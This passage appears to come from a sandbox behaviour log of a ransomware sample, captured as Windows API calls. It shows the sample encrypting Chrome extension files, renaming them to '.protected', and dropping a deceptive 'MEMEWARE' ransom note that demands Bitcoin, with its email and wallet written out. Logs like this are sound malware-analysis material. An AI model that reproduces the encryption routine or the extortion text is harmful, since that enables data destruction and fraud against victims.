(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.675] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.675] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.675] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.676] CloseHandle (hObject=0x164) returned 1 [0078.676] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0078.676] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0078.676] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0078.676] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned 141 [0078.676] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0078.676] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0078.676] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*") returned 143 [0078.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.677] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.677] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.677] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\.") returned 143 [0078.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.677] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.677] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.678] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.678] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.678] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\..") returned 144 [0078.678] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.678] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.678] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.678] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.678] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.678] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.678] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.678] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.678] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.678] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.679] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.679] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.679] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd6, lpOverlapped=0x0) returned 1 [0078.680] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.680] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.680] CloseHandle (hObject=0x168) returned 1 [0078.680] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected") returned 165 [0078.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json.protected")) returned 1 [0078.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.681] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.681] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0078.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.682] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.682] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.683] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.683] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.683] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.683] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.683] CloseHandle (hObject=0x164) returned 1 [0078.683] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0078.683] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0078.683] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 141 [0078.683] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0078.683] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0078.683] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*") returned 143 [0078.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.683] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.684] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\.") returned 143 [0078.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.684] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\..") returned 144 [0078.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.684] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.684] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.684] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.684] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.685] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned 155 [0078.685] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.685] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.686] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.686] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.686] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.686] CloseHandle (hObject=0x168) returned 1 [0078.686] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected") returned 165 [0078.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json.protected")) returned 1 [0078.687] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.687] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.687] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0078.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.687] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.687] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.696] lstrlenA 